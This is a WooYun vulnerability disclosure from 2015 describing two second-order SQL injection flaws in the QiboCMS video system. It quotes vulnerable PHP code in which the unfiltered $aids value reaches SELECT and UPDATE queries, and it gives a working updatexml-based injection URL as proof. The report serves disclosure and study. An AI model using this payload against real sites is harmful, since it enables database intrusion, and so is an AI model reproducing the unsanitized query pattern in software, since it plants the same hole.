当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115140

漏洞标题:齐博cms视频系统最新版注入漏洞2枚

相关厂商:齐博CMS

漏洞作者: 路人甲

提交时间:2015-05-21 15:05

修复时间:2015-08-24 15:07

公开时间:2015-08-24 15:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

详细说明:

video/member/special.php

elseif($job=='addsp')
{
if($step==2){
$yz=($groupdb[PassContributeSP]||$web_admin)?1:0;
$db->query("INSERT INTO `{$_pre}special` ( `fid` , `title` , `keywords` , `style` , `template` , `picurl` , `content` , `aids` ,`uid` , `username` , `posttime` , `list`, `allowpost`, `yz`, `banner` ) VALUES ('$postdb[fid]','$postdb[title]','$keywords','$style','','$postdb[picurl]','$postdb[content]','$aids','$lfjuid','$lfjid','$timestamp','$timestamp','$postdb[allowpost]','$yz','$postdb[banner]')");
refreshto("special.php?job=listsp","??",1);
}


$aids没有初始话而且在全局文件中也没任何过滤,在加上齐博的伪全局机制使得$aids直接入库了
看看在什么地方出库了(在两个地方出库进入查询)
第一处:
video/showsp.php

$rsdb=$db->get_one("SELECT * FROM {$_pre}special WHERE id='$id'");
//这里查询取出aids
if(!$rsdb){
showerr("ݲ!");
}elseif($rsdb[yz]!=1){
if(!$web_admin&&$lfjuid!=$rsdb[uid]){
showerr("ûͨ");
}
此处省略代码若干
if($rsdb[aids])
{//这里如果rsdb[aids]存在就带入查询
$query = $db->query("SELECT A.*,D.content FROM {$_pre}article A LEFT JOIN {$_pre}reply D ON D.aid=A.aid WHERE D.topic=1 AND D.aid IN ($rsdb[aids])");
while($rs = $db->fetch_array($query)){
$rs[content]=preg_replace('/<([^<]*)>/is',"",$rs[content]); //HTML˵
$rs[content]=preg_replace('/ ||&nbsp;/is',"",$rs[content]); //ѶĿոȥ
$rs[url]="$Mdomain/bencandy.php?fid=$rs[fid]&id=$rs[aid]";
$rs[subject]="<a href='$rs[url]' target=_blank>$rs[title]</a>";
$_listdb[$rs[aid]]=$rs;
}


select出aids 然后直接又带入查询 造成了注入漏洞
第二处:
video/member\list.php

if($step==2){
if(!$aidDB){
showerr("请至少选择一篇视频");
}elseif(!$Type){
showerr("请选择操作目标,是删除还是审核等...");
}
if($Type=='yz'){
if($T_yz<1){
$Type=='unyz';
}
}elseif($Type=='leavels'){
if($levels<1){
$Type='uncom';
}else{
$levels=1;
$Type='com';
}
}
//if($Type=='delete'){
//make_more_article_html("$FROMURL","del_0",$aidDB);
//}
$fid_str ='';
foreach( $aidDB AS $key=>$value){

if($webdb[Html_Type]==1&&$Type=='delete'){ //删除信息后,就读不到内容了
$rs=$db->get_one("SELECT fid FROM {$_pre}article WHERE aid='$value'");
$fid_str.="&bfid_array[]=$rs[fid]";
}
do_work($value,$Type,1);
在这里调用了do_work函数 跟进
video/inc/artic_function.php
function do_work($id,$job,$check=0){
global $db,$_pre,$timestamp,$lfjid,$lfjdb,$webdb,$web_admin,$reason,$Fid_db;
。。。
elseif($job=='special')
{
global $spid;
if(!$spid){
showerr("请选择一个专题");
}
$rssp=$db->get_one(" SELECT * FROM {$_pre}special WHERE id='$spid' ");
$detail=explode(",",$rssp[aids]);
var_dump($detail);
if( !in_array($id,$detail) ){
if($rssp[aids]){
$rssp[aids]="$id,$rssp[aids]";

}else{
$rssp[aids]="$id";

}

$db->query("UPDATE `{$_pre}special` SET `aids`='$rssp[aids]' WHERE id='$spid'");
}
$array[title]="你发表的《{$rsdb[title]}》被设置专题了";


把出库的aids带入了update语句,造成sql注入

漏洞证明:

http://localhost/video/video/member/special.php?job=addsp&postdb[fid]=1&postdb[title]=2222&id=11&step=2&aids=2)%20and%20updatexml(0,concat(0xa,user()),0)%23
http://localhost/video/video/showsp.php?id=14

44.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-24 15:07

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论